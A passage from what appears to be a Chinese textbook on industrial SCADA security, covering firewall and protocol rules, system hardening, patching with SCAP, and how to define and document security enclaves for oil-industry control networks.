所有的规则应该严格限制流量,特别是对于IP 地址和范围。 ⑤ 需要对从控制网络到企业网络之间的流量进行保护。在 DMZ 区域内,所 有流量都会被阻断。 ⑥ 在控制网络和 DMZ区域之间所有允许通行的协议,都明确地禁止在 DMZ 区域和企业网络之间互联;反之亦然。 ⑦ 所有来自外部控制网络到企业网络的外部流量,均需要标明源地址和严格 限制服务和端口的目的地址。 ⑧ 来自控制网络或者 DMZ 区域的外部数据包,当且仅当通过控制网络和 DMZ 设备的源 IP 地址正确的情况下,才允许数据包通过。 ⑨ 控制网络设备禁止连接互联网。 ⑩ 控制网络不能与互联网直连,即使有防火墙的保护也不行。 ① 防火墙流量管理应该在隔离、安全的管理网络下,或者在多方认证加密的 网络条件下,利用限制连接到特殊管理设备 IP 地址的方法。 以上只是指导方针。在设置防火墙规则之前,需要对每一个控制环境进行仔 细的部署,配置防火墙需要考虑特殊的需求和规则,再加上前面提到的通用规则。 通常不同的组织构架需要不同的配置,对于特殊的需求和设置,需要有规范的实施 记录。工业自动化开放组织(IAONA) 提供了一系列的分析需求、评估协议、安全 风险部分和相关措施。 2)域名系统(DNS) 域名系统主要作用是在域名和 IP 地址之间提供转换。虽然现阶段在控制网 络的使用还不多,但是大多数的互联网服务都依靠 DNS 服务。大多数情况下,当 DNS 请求从控制网络发往企业网络,或者从企业网络发往控制网络都是不合理 的。来自控制网络发往 DMZ 区域的 DNS请求必须逐项予以分配地址为基础。推 荐使用本地的 DNS 或者主机文件。 3)超文本传输协议(HTTP) HTTP 协议是建立在互联网中Web 浏览器服务下的协议。类似 DNS, 该协议 对互联网服务非常关键。 HTTP 协议用于完成连接请求的场合非常普遍,不幸的 是 ,HTTP 协议并没有注重考虑安全特性,许多 HTTP 应用都存在可以被利用的脆 弱性,HTTP 协议可以作为手动攻击和自动化传播蠕虫的渠道。 大体上,并不推荐从企业网络到过程控制网络的 HTTP 访问。因为在这种情 形下,需要在防火墙上配置代理,预防边界脚本和Java 应用。可以避免来自外部 的 HTTP 访问连接直接访问控制网络,因为这样就会暴露重要的安全风险。如果 确实存在 HTTP 访问过程控制网络的需要,建议使用安全的 HTTPS 协议替换,并 且只能访问特定设备。 4)文件传输协议(FTP) 和简单文件传输协议(TFTP) FTP 和 TFTP 协议主要用于在不同设备之间传输文件,也可用于几乎每一种 平台,例如多种 SCADA 系统,DCS、PLC 和 RTU, 主要因为它们的通用性,并且具有 最小化的处理能力。不幸的是,上述协议的设计过程中没有考虑信息安全因素,对 于 FTP 协议,登录密码并没有加密。此外,许多 FTP 协议都存在能够被缓冲区溢 出的问题。对于TFTP 协议,不需要登录认证,所以建议用户阻断所有 TFTP 通 信 信道,当且仅当采用多因素认证和基于令牌的安全加密信道方式,才能使用 FTP 连接外部边界。在所有可能情形下,用户需要更多地考虑安全协议、类似安全 FTP (SFTP) 或者安全 Copy(SCP) 协议。 5)Telnet (远程登录协议) Telnet协议定义了在客户端和主机之间,基于文本交互的通信方式。主要用 于当资源受限或者对安全需求不高的情况下,远程登录和控制系统服务。在Tel- net 协议中,包括密码在内的数据都是未经加密的,这也面临严重的安全威胁,因为 这样就可以访问远程的个人主机控制设备。不建议在企业网络到控制网络内使用Telnet 协议,除非使用基于令牌的多因素的认证,并且使用加密的信道。推荐向外 部的Telnet 协议使用特定的加密信道(类似 VPN)。 6)简单邮件传输协议(SMTP) SMTP 是一款在互联网上传送邮件的协议。由于恶意软件经常嵌入在邮件 中,所以应当禁止任何发往控制网络设备的电子邮件流量。从内部控制网络向企 业网络的 SMTP邮件也应当有报警响应。 7)简单网络管理协议(SNMP) SNMP 协议是在控制管理中心和网络设备之间提供网络管理服务的协议。类 似路由器、打印机和PLC。尽管SNMP是一款维护网络非常有用的服务,但是其安 全性在版本1和版本2中却非常差。因为在读取和配置设备传输中,SNMP 协议 均使用未加密的明文。特别是在一些情况下,存在已知密码而且还不能被修改。 版本3的设计考虑了安全性,但还是应限制其使用的范围。建议禁止从控制网络 发送和接收的 SNMPV1 和 V2 版本的命令。只能在隔离安全的网络管理条件下, 才使用SNMP V3 版本。 8)分布式组件对象模型(DCOM) DCOM 使用OLE 处理 OPC 和ProfiNet 之间的通信,使用微软的 RPC 服务。未 打补丁的 RPC 服务有很多脆弱性,这些脆弱性建立在 Blaster 蠕虫病毒的基础上。 另外,使用DCOM 的 OPC会动态地在一定范围内开放端口(1024~65535),这一特 征很难被防火墙过滤。建议只能在控制网络和 DMZ区域之间使用 DCOM,明确禁 止在 DMZ区域和企业网络之间使用。同样的道理,建议用户在使用 DCOM 时在 设备上严格地限制端口的使用范围。 9)SCADA 和工业协议 SCADA 和工业协议,如 MODBUS/TCP,EtherNet/IP 和 DNP317,它们对于大多 数控制设备来说都是关键的通信协议。不幸的是,这些协议设计的时候均未考虑 安全的因素,而且向远程控制网络发送命令时缺乏认证。建议只有在控制网络中 使用以上协议,并且禁止在企业网络中使用。 10)反病毒和恶意软件检测 典型的实践文档建议,在条件允许的情况下,在所有计算机上均安装反病毒软 件。而且这些反病毒软件必须经过正确的配置和更新。对于移动存储设备的使 用、类似 USB存储设备和笔记本计算机,这些设备也都需要防止恶意软件。 11)备份、存储和灾难恢复 良好的安全策略可以抵抗攻击、漏洞利用和错误。数据备份和存储设备就起 到了关键的作用。 建议系统选择优良的备份策略和构架。备份功能也是系统的基本需求之一。 周期性的备份可以保障数据存储和灾难恢复。数据备份需要在以下情况下提前备 份:新软件安装前;操作系统升级前;硬件设备改动前;对于设备的任何改动前。 许多数据也需要备份,包括操作系统文件、应用软件、配置数据、数据库、文件 日志等。 建议为完整备份定义一套全面的方案。已经存在许多现成的解决方案,比如 在移动设备上的专用备份结构,在移动设备上的系统备份结构、分发结构和中心 结构。 需要分析研究,当备份的文件替换时并不会影响系统的崩溃。需要在备份系 统和恢复计划中,定义一种能够存储所有系统函数的方法。这些功能需要在测试 整个系统法定实验的时候得到验证。建议对备份的完整性进行性能测试。对于移 动存储设备而言,需要在传输方式和存储位置方面,进行精确管控。 12)远程接入和数据传输服务 许多组织需要远程对 SCADA 系统进行控制、对远程设备的系统访问和数据 传输,但是会涉及到安全问题。尽管如此,需要对远程接入的相关安全性进行评 估。需要对所有的远程连接进行分析,只有最小化的远程连接可以认为是正 当的。[29] 远程接入需要经过认证和审计,避免未经认证的远程连接。远程连接的计算 机需要安装反病毒软件。 建议组织增加对特殊设备、特殊人员和特殊时间访问的限制。并且通过维护 列表,其内容包括远程接入连接和访问控制点,并且包含连接形式。 13)系统加固 许多良好的实践可以加固SCADA 系统。 (1)卸载和删除不需要的软件;关闭和禁止不同的服务和端口;断开未经认证 的访问接口、配置系统,减少漏洞发生的机会。 (2)需要保护物理和逻辑上的访问诊断,以及端口配置信息,因为这些是关于 系统功能的关键服务。 (3)所有未经使用的端口需要被禁止,保护未经授权的访问;需要准确判断哪 个端口哪个服务正在被系统使用;可以通过端口扫描对系统环境进行测试。 (4)使用不可移动的设备时,类似 CD、USB 存储设备、掌上计算机等,需要对 基本事件进行分析,并且对其严格限制;当需要移动存储介质时,需要提前利用反 病毒软件对系统进行检测。 (5)建议增加测试项目,增强系统的鲁棒性、安全性和设计性能。 14)无线连接 SCADA 系统中,无线网络的使用非常广泛。无线网络易于安装,可以使设备 利用无线的方式操纵系统。另一方面,无线网络比传统有线网络更加不安全。建 议只是在对特定任务进行过效益和操作安全性考虑后,再使用无线网络。 无线网络发展迅速,在这几年,其安全方面的问题也已经被作为脆弱性。所以 定期升级产品和采用正确的配置信息就显得尤为重要。建议采用正常的流程对无线网络进行验证。 前期采用的共享密钥需要足够长,并且符合密码强度的安全策略。无线网桥 需要使用强加密手段和 VPN 信道或者 IPSec技术。 必要时,SSID需要不可见,所以应当采用隐藏的方式;建议禁止 DHCP服务。 建议考虑用户加密或者安全信道技术的方式。最高级别可采用WPA、WPA2 或者 AES等算法。连接的关键点是需要被防火墙控制,利用合适的记录和规则。 访问控制列表(ACL) 技术和认证技术需要在无线网络的安全方面进行继续研究和 发展。 需要避免人为设置的缺省密码,确保用户姓名和密码在任何情况下的安全。 15)账户管理 账户和用户管理是保护和降低未经授权的访问方法: (1)组织者需要实施合适的密码策略。必须考虑到密码的强度和使用期限, 如果一个密码不能经常地更新,那么就需要经常地更换恰当的保护策略,保护策略 需要能够包含常用的密码措施。 (2)删除未使用的账户。 (3)确保网络设备支持加密。 (4)网络设备支持基于身份的访问措施。 (5)身份和访问权需要经常进行审计: (6)更改默认密码; (7)关键函数需要进行强力的认证处理; (8)每一个用户需要使用一个专有的密码,进行认证,并且存储在安全的 位置; (9)判断遭受攻击的位置时,需要利用认证、自动锁定和自动断开的方式。 16)软件管理和升级 利用软件不同的脆弱性进行针对性的攻击。由于这个原因,软件管理和升级 就显得非常必要,需要避免安全隐患。动态的脆弱性管理和相关补丁,能够减少和 保护漏洞利用。 建议组织开发软件补丁加固策略。需要每年一次对新威胁进行定位,并且挖 掘脆弱性。有些策略都必须包括在内,比如,软件补丁不能够重新设置、删除和加 固系统、改变安全设置等。 对于典型的软件管理,存在以下四种情况: (1)评估清单,目的是对系统中的软件部件,安全威胁和脆弱性进行评估,并 且对软件进行升级。 (2)补丁鉴定,需要对软件补丁进行认证,有助于更好地理解软件的关联性和 效力,并且能够区分出更新是安全更新还是一般的软件更新。 (3)评估、计划和测试,目的是在环境操作中,判断哪些补丁可以开展实施,如何计划和实施软件更新,并且确保更新与系统匹配,使用测试的方法在现实网络环 境中判断这些行为。 (4)发展,目的是对软件更新的操作环境、系统最小化方面进行判断。 鉴于此,软件管理和升级办法如下: (1)使用安全内容自动化协议(SCAP)。 企业管理安全系统需要面临以下挑战: ① 大量的不同种类的系统和软件的安全。这使得评估和管理系统补丁更加 复杂,时间损耗大。 ② 需要对新威胁快速响应。每一年都有上千种软件漏洞被发现,因此,组织 者需要开发出一种自动化的方法用来检测问题,并且快速地将重大漏洞定位出来。 ③ 缺乏协作的问题。许多安全软件都拥有私有的格式、规范和内容。所以, 由于不同软件的设计缺乏协作,依然会导致延迟和安全评估方面的问题。 组织者需要一个全面的、标准化的方法来克服以上挑战,并且安全内容自动操 作协议已经提供了一些可行的方案。SCAP 协议由一套特殊化的组织和安全信息 相关标准化的方法组成,类似相关参考数据,包括软件漏洞鉴定和安全配置方面。 SCAP 协议可以用来维护企业系统的安全性,类似自动化验证安装补丁、检测系统 安全配置信息、检查系统标识信息。 SCAP 由以下两个方面构成: ① 协议,由六个开放的部分组成,采用相关安全信息的标准化的格式和命名 规则。其中,每一个部分都称作 SCAP 部件。 ② 关于软件漏洞的标准参考信息和安全配置。 表4.3包含 SCAP协议中6个部件。前面三个部件定义了安全信息相关的命 名规则和路径。CVSS用来测量脆弱性特征和基于脆弱性的威胁评分。XCCDF 和 OVAL部件用来定义安全清单、生成报告、特殊安全测试、自动化更新和补丁工具。 表4.3 SCAP部件 部件 描述 部件 描述 通信配置列举(CCE) 系统安全议题的术语和 路径 脆弱性评分系统 (CVSS) 安全相关软件脆弱性测 量规范 普通平台列举(CPE) 名称和版本相关议题和 路径 扩展配置清单描述 格式(XCCDF) 特殊语言清单和报告结 果清单 暴露的脆弱性(CVE) 安全相关漏洞的议题和 路径 开放脆弱性评估语言 (OVAL) 低级测试流程清单 SCAP 内容,包含比如从不同的资源中,搜集到的可用的SCAP 相关安全信息。 利用在不同资源和不同安全制造产品中的通用性,定义 SCAP 标准。 安全软件产品可以利用SCAP设备的特殊部件和相关参考数据。NIST 建立了SCAP产品确认和SCAP实验鉴定项目。这些项目保证产品经过测试,确保可以 实施SCAP。产品可以确认一个或者六个SCAP 部件,并且确认特殊的SCAP 性能。 软件也能利用SCAP的性能。每年,产品中的 SCAP都需要确认更新,因为 SCAP 会根据暴露出的不同的安全能力和威胁,进行升级换代。 SCAP 性能直接影响了许多SCAP 协议的使用。定义的 SCAP 性能可以及时 改变。根据 NIST,定义了当前的性能列表: ① FDCC Scanner。审计和评估目标系统的能力,用来检测 FDCC 需求的关 联性。 ② 认证配置扫描。审计和评估目标系统,利用目标系统的登录权限,检测相 关配置信息。 ③ 认证脆弱性和补丁扫描。扫描目标系统的能力,定位和鉴定当前已知脆弱 性和评估软件补丁状态,验证目标系统登录权限,定义相关补丁策略。 ④ 未验证脆弱性扫描。检测当前已知脆弱性的能力,利用网络评估目标 系统。 ⑤ 补丁安装。在目标系统上,利用定义的补丁关联策略,安装补丁的能力。 ⑥ 误操作补救。目标系统相关配置的切换能力。 (2)依据SCADA 系统的目标任务进行分配。 ① 对于关键工业IT 基础设施而言,安全任务分配和管理是一项基本原则。 大多数的成果都是关于协作信息系统的。工业系统(包括SCADA 系统)包含了许 多特殊的特点:不同环境的融合(包括实时系统和桌面应用),物理层功能的限制 (包括电力稳定性)和商业目标(比如生产力和性能)。这些因素约束检测 IT 系统 是如何进行的:比如,为了安装安全补丁,采用中断工业系统的做法并不常用。[30] ② 对于评估和管理不同安全信息资产。 一些涉及到系统特征(比如对脆弱 性、评估以及安全策略的鉴定认证),还有其他威胁(目的,资源,能力),以及一些 潜在攻击策略,包含相关避免或减少相关被动策略的事件。还包括对恶意行为和 意外事件或者人工错误的交互作用。 ③ 对于信息和通信系统的内部连接,需要增加系统的复杂性级别设计、配置、 操作和本地安全策略定义,原因在于攻击行为有可能带来难以预见的紧急情况和 其他相应的管理问题从而增加系统的负面效应。 第5 章 基于工业SCADA 系统安全域 的信息安全技术及应用 本章主要包括工业控制系统信息安全域识别、边界和资产防护的方法及在石 油 SCADA 系统中的应用,同时讨论定义安全域内常规行为,监视每一个安全域内 的所有活动等重要内容。 5.1 工业 SCADA 系统信息安全域的 识别方法和建立过程 识别工业 SCADA 系统功能集合、建立工业控制系统信息安全区域的第一步 是识别任意和所有的安全集合,该步骤决定每个区域的组成部分和边界所处的位 置。每个“功能集合”指的是直接和特定功能相关的任何模块,当识别功能集合 时,需要开展的工作是评估所有资产(物理设备)、系统(软件或应用程序)、用户、 协议和其他项目。从一个整体系统中分离两个项目,如果两个项目可以互不影响 地分离开,它们就属于两个不同的功能集合。例如,如果一些 HMI(人机界面)系 统使用 DNP3.0 协议,并创建所有使用 DNP3.0 协议通信的设备列表,就可以评估 每一个设备中的 DNP3.0 协议是否对该设备的功能正常运行是必要的(该设备可 能支持多种协议,并可能使用多种不同协议完成其功能),评估的结果是产生一张 使用该种协议的所有资产的列表。类似地,识别功能集合还需要调查一个工业控 制系统网络中哪些资产是相互联系的,包括物理和逻辑联接。每一项这类联接关 系表示一个功能集合中存在的基于网络的联通性。31] 一个工业控制系统中的功能集合可以基于任何事物定义。工业控制系统中通 用的功能集合包括网络联通性、控制循环、监视控制、控制过程、控制数据存储、关 联通信、远程访问,甚至不常见的集合,如用户和角色协议、危险程度。 1)网络联通性 基于网络互通性的功能集合是容易理解的,因为网络的自然属性就是将设备 连接在一起,不同的设备为什么能联接在同一个网络上,主要是由于这些设备属于 同一个互联集合,并被网络硬件边界包含,使用网络拓扑图可以很容易确定物理网 络边界。理想情况下(尽管不是实际情况),每个连接过程都存在物理访问节点, 这类节点更多的情况是由防火墙或其他防护设备组成。 逻辑网络边界由将一个物理网络变为多个地址空间的路由器构成,路由器在 网络间提供了逻辑划分,使得所有从一个逻辑网络到另一个逻辑网络的通信经过 路由器,此处,可以实施 ACL和其他保护措施。虚拟局域网(VLAN) 是另一种类型 的逻辑边界,但它一般部署在第2层而不是在第3层。虚拟局域网在以太网数据 包头中使用标准的标签标识路由器应如何处理该数据包,目的地是相同的 VLAN 的流量可以进行交换,目的地是不同VLAN 的流量可被路由。然而,虚拟局域网一 般不建议用于完成信息安全防护功能,因为可以修改数据包头,进而跳过虚拟局域 网,最终绕过路由器。 2)控制循环 石油 SCADA 系统的一个控制循环由完成特定自动化过程的设备组成,将自 动控制过程列表中的设备应用到一个功能集合中非常简单。在多数情况下, 一个 控制循环由一个 PLC 和任意相关的输入和输出设备组成,石油 SCADA 系统的结 构如图5.1所示。如果一个 IED 是一个控制逻辑的直接输入或输出,那么这些设 备与控制器共享一个功能集合;如果不是,则不共享。2] 图5 . 1 基于控制循环的功能集合 具体在控制系统网络中的什么位置定义一个基于网络连接的功能集合,是一 个宽广的话题,将产生大量的功能集合。构建基于控制循环的功能集合是一个非 常精确的任务,创建的功能集合也许会很多,每一个集合包含相对数量较少的设备 (一个特定的 PLC 或 RTU,和一组中继器和IED)。 3)监视控制 每个控制循环将连接到一些类型的监视控制设备上,典型的是负责配置、监视 和管理自动控制过程的人机交互界面(HMI) 。 由于 HMI负责管理PLC, 所以这两 个设备属于同一个公共的功能集合。但是,由于HMI 不直接管理与 PLC 连接的 IED,所以这两个设备不是必须像 HMI 和 PLC 那样位于同一个功能集合中(它们 属于基于其他标准的功能集合,例如,使用的协议)图5.2显示了通用管理功能 集合。 基于HMI的功能集合 ·HMI · 通过HMI来控制PLC ·所有主控制器均负责HMI Historian MTU HMI 图5 . 2 基 于HMI 的功能集合 所有被 HMI控制的 PLC 都包含在内,它们是主HMI或控制管理系统,负责控 制初始化的 HMI。其他的 HMI不包含在内,它们不负责初始化HMI。每个 HMI 描述了自身的功能集合。 4)控制过程 如果一个主控制器或主终端单元(MTU) 用于与多个 HMI 通信,每个 MTU 负 责一个大型控制过程的特定环节,设备表示另一个功能集合的根节点,这种情况功能集合将包含所有相关的HMI。 如图5.3所示的例子介绍了控制过程通信和历史 记录的概念。 图5 . 3 基于控制过程的功能集合 如果一个 MTU 与一个 ICCP(内部控制中心通信协议)服务器进行交互,为了 使大批通信数据与另一个实体之间的正常通信,ICCP 服务器也应该包含在 MTU 的功能集合中。类似地,如果从MTU 而来的过程信息流入数据历史中,那么这个 系统也应该被包括。 5)控制数据的存储 许多工业自动化与控制设备自动生成数据[33],反映当前配置、过程状态、警报 和其他信息。这些信息被历史数据库记录收集。历史数据库系统可以连接控制系 统网络、监视网络和某些业务网络中的设备,如图5.4所示。 6)关联通信 在有些情况下,工业控制系统中的多个控制中心之间需要进行通信交互,相关 国际组织已经开发了一套专用协议——内部控制中心通信协议(ICCP), 用于完成 这种特定的任务。ICCP连接过程需要明确定义客户端和服务器之间的连接,因此 任何利用ICCP 协议实现现场设备与公司控制中心的通信,都需要定义至少一个 ICCP服务器,和至少一个ICCP 客户端(这可能是一个单一的物理设备或多个分布 式的服务器)[34]。这是功能集合中第一个扩展到广域网(WAN) 的例子,如图5.5 · 所有的 HMIS,PLC,ICCP Server,IED · 任何复制历史数据或者监控工作站获取 图5.4 基于历史记录的功能集合 图5.5 基于ICCP用于业务通信的功能集合 所示。 当评估此类关联功能集合的设备时,远程客户设备需要被明确定义,即使该设 备属于其他公司所有或位于其他位置,这些远程客户端应该被包含在功能集合中, 因为它们与本地可能使用的ICCP 服务器有不同程度的联系。 由于ICCP连接通常用于关联交易,客户端访问操作控制信息是必须的环节, 这种过程可能是手动或自动化的查询过程,在这种情况下,历史数据记录也包含在 “关联交易通信”功能区域中。 7)远程访问 许多控制系统和工业现场设备(包括 HMI,PLC,RTU, 甚至 IED) 允许进行技 术支持和诊断的远程访问。这种远程接入过程可以通过拨号电话连接,或通过可 路由的网络访问。如果工业控制系统中提供远程接人现场控制系统设备,应该通 过专用的虚拟网络(VPN) 或远程访问服务器(RAS) 加以控制,并且应该只允许明 确定义的、从已知实体发起的点对点连接,并通过安全和加密的信道(33)进行连接。 这些专门定义的用户,它们所访问的设备和用于建立远程接入的任何VPN 或 RAS 系统构成一个远程访问功能集合,如图5.6所示。 图5 . 6 基于远程接入的功能集合 通过从功能角度隔离远程连接,可以部署额外的安全措施,这项工作对于防止 向攻击者暴露脆弱性或漏洞非常有意义。 8)用户和角色 每种工业控制系统最终都会由用户或其他系统访问。到目前为止,本书所讨 论的功能集合的定义都是围绕后者,详细定义了某些设备应该怎样合法地与其他 设备通信。对于人机交互而言,例如操作人员通过HMI 接口调整控制过程,同样 重要的是需要定义哪些用户可以合法地与哪种设备进行通信。该过程需要鉴别和 认证管理(IAM) 系统,该系统将能定义用户及其角色,众多商业IAM 系统中最著 名的例子是微软的活动目录服务。图5.7解释包含用户及其允许交互设备的功能 集合的概念。[36,37 图5.7 基于功能集合的用户和角色 将工业控制系统设备的角色和相应的权限映射对应起来也许很复杂,但却很 重要,因为功能集合能够用来监视利用其他合法用户进行的非授权的系统访问。 也就是说,拥有特定的HMI 控制系统访问权限的员工,在不中断其本职操作职能 的情况下,可以恶意干预其他系统的日常运行。通过将用户以及该用户所能访问 的设备放置在一个功能集合中,这种类型的活动能够很容易检测和保护(定义功 能集合仅仅是建立安全区域的第一步,功能集合应该进一步精确到实际的区域,然后在内部和边界上进行保护)。 9)协议 工业 SCADA 系统设备所使用的协议应该被明确地定义,以便于建立基于协 议的功能集合。应该只有已知使用DNP3.0 协议的设备使用过DNP3.0, 如果任何 其他设备使用DNP3.0, 这就是明显的异常事件,该行为应该能被快速检测并立刻 阻止[38]。这样一来,使用专用工业协议的专用设备应该被识别并记录下来,为此 可以建立一个更重要的功能集合。图5.8所示是一个典型的石油 SCADA 系统功 能集合。 图5.8 基于协议的功能集合 10)危险程度 基于安全域的工业控制系统安全防护方法主要是将通用的威胁因素隔离到各 种功能集合中,以便这些因素能保持分离状态并排除其他因素的相互影响。美国 核能管理委员会(NRC) 在其 CFR73.54 中明确定义资产的危害程度,以便它们能 够被分为5个逻辑上安全的区域。NRC 安全域是一种利用基于域的信息安全方 法的例子,该例子使用基于危害程度进行分类的功能集合。NRC 规则提供了一个 例子,描述了当区域的危险程度增加时,如何使用更健壮的安全措施。在 NRC 指 导手册的第5.71节,明确界定了不同功能区域所能提供的安全级别。 北美电力可靠性公司(NERC) 定义的重要资产,是指那些能够影响大容量电 力系统运行的系统,包括控制中心、传输子站、发电系统、灾难恢复系统、黑启动发 电机、卸载系统和设备以及专用保护系统等。可以用简单的逻辑方法学识别它们, 决定某种区域的危险程度是一个类似的、直接过程,可以使用如图5.9所示的 方法。 图5 . 9 决定安全域的危险程度 然而依据危险程度利用简单定义的功能集合识别安全域的方法将导致很少的 安全域(总共5个,使用NRC指南)。相反,在工业控制系统中定义越多的安全域, 整个工业控制系统的安全性就越强,边界方法学可以识别更多的不同区域。因此, 利用以上10种方法定义的功能集合中的上下文,可以评估危险程度。通过这种方 法,大多数的重要系统由额外的独立层保护——区域自身固有的安全和区域内的 重要的和非重要项目之间的额外保护。这将会有助于保护重要的设备免受内部威 胁,如果心怀不满的员工能够在物理和逻辑上访问上级区域,则额外的独立层也能 阻止从一个重要系统到另一个的旁路攻击;如果所有的重要系统被集合在一起,因 为它们都是“关键的”,对一个重要系统的成功突破会将整个重要设施置于危险 境地。 5.1.1 利用功能集合建立工业 SCADA 系统安全域 1)使用功能集合识别安全域 基于服务、协议、危险程度和其他运行特征因素等定义功能集合,是一种有效地从功能集合中排除未知、非授权设备的方法。简单而言,如果两个设备没有共享 公共资源,那么两个设备之间就没有办法进行通信[40]。在有些情况下,许多设备 支持多种协议、应用、服务等,导致可能存在多种功能集合重叠的情况,图5.10所 示是基于一个通用控制器和基于控制协议的两个功能集合,第二个集合与第一个 集合存在部分重叠情形。 图5.10 可重叠功能组 该图显示在具有多种变量属性的条件下,定义边界清晰的功能集合具有一定 困难。将图5.1基于控制循环的功能集合到图5.8基于协议的功能集合一层层地 叠加起来,会产生许多重叠的功能集合(图5.11所示),很难定义清楚。[41] 理想情况下,每一个功能集合都与其他功能集合存在一个清晰的边界划分,每 个边界都将使用唯一的保护设备进行保护。但是,在许多情况下,有必要使用功能 集合之间通用的特征简化功能集合,可以有效地将重叠的功能集合组合成为一个 更大的、独立的安全域。将多个功能集合整合成为一个可控集合的过程,将产生出 多个定义完好的安全域,这些安全域的边界、用户、设备和所包含的协议条件依然 很清晰。 2)建立工业 SCADA 系统安全域 一旦完成数个功能集合的配对过程,并且功能集合之间的重叠规模已经固定, 于是就建立起安全域。在这种情形下,工业控制系统安全域已经从逻辑角度定义 清楚,功能集合的固化过程,就相当于一个单一的安全域的建立。 图5.11 功能集合存在许多重叠 建立工业控制系统安全域的过程一般如下: (1)识别每个安全域的边界,以便边界防御措施能够在正确的位置部署。 (2)对网络结构进行必要的修变,使得网络架构与所定义的安全域保持一致。 (3)将安全域进行文档格式化处理,以便用于策略开发和执行。 (4)将安全域进行文档格式化处理,以便用于安全设备的配置。 3)识别工业控制系统安全域边界 一旦识别出工业控制系统的安全域,它就需要被映射到实际的工业控制系统 网络中,以便能够清晰地定义其网络边界。这个过程最初是在北美电力可靠性公 司(NERC) 规则——CIP 005 中要求的,但它对于任何工业控制系统网络而言都是 一个必须有的环节,因为只有预先定义好控制接入点,安全域才能得到保护。在许 多工业控制系统例子中,安全域的边界非常清晰,例如在工业控制系统控制中心监 视局域网和控制系统网络之间存在单独的网络连接。在一些例子中,存在多连接 的情况,例如,电力发电设备可能同时连接监视和控制网络,也可能直接连到变电 站或远程现场站点上,所有进出安全域的网络连接构成电力安全域的边界。 这里提示:在识别安全域边界时,很容易忽略无线、拨号和其他远程连接。如 果无线接入点位于安全域内部,那么一个无线用户能够直接通过WiFi 通道接入到 安全域中。因此,接入点就是安全域边界的一部分,甚至该接入点能很好地连接到 安全域内部。当保护边界时,这种接入点必须受到保护。在定义安全域边界时,考 虑所有远程连接点,会得到更安全的安全域。 在一些例子中,如图5.12所示, 一个单一区域可能由多个地理位置上分离的 集合组成。在这些例子中,区域还是被认为是单一区域。如果在两个或更多个区 域直接存在任何网络连接,则在其余区域中它们承担相同的控制。这些链接之间 没有通信,它们在区域内发生和终止,如果需要外部通信(例如, 一次通信从外部 区域发起或终止),它必须通过定义的安全的接入点发生。互联分布区域的一个 通用的方法是使用专用的 VPN 或其他加密网关,对极其重要的区域,使用专用网 络连接或光纤电缆来维持物理隔离。 图5.12 地理位置分离的区域 目标是使每个区域尽可能严格地分离,在区域和其他直接邻近(或围绕的)区 域之间存在尽可能少的连接。5.13显示了如何通过提供单一的、出入区域的接入 点,这个接入点使用了边界安全设备,例如防火墙或IPS 来加以保护。在单一区域 被分离(地理上或被其他区域)的事件中,区域间的通信仍然被允许,在这种情况 下要使用边界防火墙,它能够在分隔的区域之间有效增强点对点路由(这个路径 也应该被加密)。 执行通信路径 一个跨越多个边界 图5.13 安全域边界 在安全域边界需要扩展到其他安全域边界内的应用场景中,应该考虑所需要 扩展的功能目标。例如,在许多情况下,某个商业用户需要访问一个来自工业 SCADA 系统安全域中的信息,但该网络用户并不需要与工业SCADA 系统网络进 行通信交互。在这种情况下,就应该使用单向通信机制,可以通过预先定义的网络 中间边界参数条件(例如,图5.13所示防火墙),或可以通过使用数据二极管或重 定向网关禁止入站流量。42] 4)网络结构和用户身份动态改变的情形 不属于某个预先定义的工业控制系统安全域内的设备,不应该直接连接到该 安全域,或与安全域中的其他设备连接。然而,在很多情况下,尽管一些设备不属 于某个功能集合,但还是访问或连接到该安全域中。例如,打印机或工作站不属于 固定的安全域,但它们可能连接本地的交换机或路由器接口,或者连接一个无线接 入点。这类情况可能会导致不正确的网络设计或不合理的网络寻址机制——不管 是什么结果,都需要在连接安全域之前解决这些异常问题。 在有些情况下,不可能清晰地识别工业控制系统网络安全域边界。例如,如果 管理、控制和企业系统都通过扁平的网络(如整个网络只在第二层进行交换,没有 网络路由或其他隔离设备)或无线网络互连,也就不可能将一个功能集合与另一个 功能集合隔离开。在这种情况下,可能需要重新设计完整的网络架构,将安全区域细 化到访问节点,在这个安全域中只有属于本域内的设备能够通过网络直接互联。 5)开发安全域及其相应的安全策略 一旦已经明确定义一个工业控制系统安全域,并对网络结构进行调整,工业控 制系统生产企业将受到满足NERC CIP,ISA-99,CFATS 安全防护条例中规定的 各种保护。 通过清晰地识别哪些系统可被其他系统访问以及相应的访问途径,并文档化 记录一个工业控制系统内已经定义的安全域策略,会带来很多好处。例如可以简 化合规性策略的文档化记录过程,安全培训过程,同样可以精简由NERC CIP 003, NERC CIP 005,ISA-99 FR,CFATS 等标准规定的同类安全策略的文档化记录 过程。 安全域的文档化记录过程,也定义了如何进行安全评估和漏洞测试的方法,该 过程也有助于对 NERC CIP 008,ISA-99,NRC CFR73.54 等标准的合规性测量。 6)安全域和安全设备配置 将安全域进行文档化记录本身也是一种类似合规性要求的安全功能。防火 墙、人侵检测系统和入侵防御系统、安全信息和事件管理(SIEM) 系统,以及很多其 他安全系统都支持使用变量,变量可以用来将复杂的安全配置映射成结构化的安 全策略。 对每个工业控制系统安全域而言,应保持下述列表处于不断更新状态: ① 使 用IP 地址进行记录的同一个安全域中的设备。 ② 根据用户名或其他标识记录的、同一区域内的授权用户。 ③ 安全域内使用的协议、端口和服务。 如果出现其他类型的安全域识别要素,应当及时创建其他列表。依据所定义 的安全域数量,可能需要维护很多列表——对每个已建立的安全域至少需要3个 标识参数列表(设备、用户和端口/服务)。其他参数列表同样也需要维护,例如 在一些用户变化频繁的情况下,需要定义除单独用户信息之外的其他参数。然而, 除非存在一个正在使用的第三方中央认证系统,否则维护这样的参数列表是一项 非常繁杂的任务。 当列表配置完成时,变量将以如下形式呈现: $ControlSystem_Enclave01_Devices 192.168.1.0/24 10.2.2.0/29 $ControlSystem_Enclave01_Users jcarson jrhewing kdfrog mlisa $ControlSystem_Enclave01_PortsServices TCP 502 #Modbus TCP TCP 20000 #DNP3 创建这些变量有助于防火墙和 IDS 配置用于增强安全域边界的规则,同时也 有利于安全监视工具检测异常事件,并产生报警。 在上述例子中,为定义一个可用的变量并映射到安全域中,使用 var Control- System_Enclave01_Devices[ 192.168.1.0/24, 10.2.2.0/29] 的形式,该变量被以 $ControlSystem_Enclave01_Devices 形式出现的特殊规则所引用。该规则是许多 IDS 策略中经常使用的、较为经典的$HOME_NET 变量的逻辑表达式, 一般仅应 用于特定的安全域中。这种机制允许在安全域内进行基于异常的非授权行为检 测,如下所示的规则表示以IP 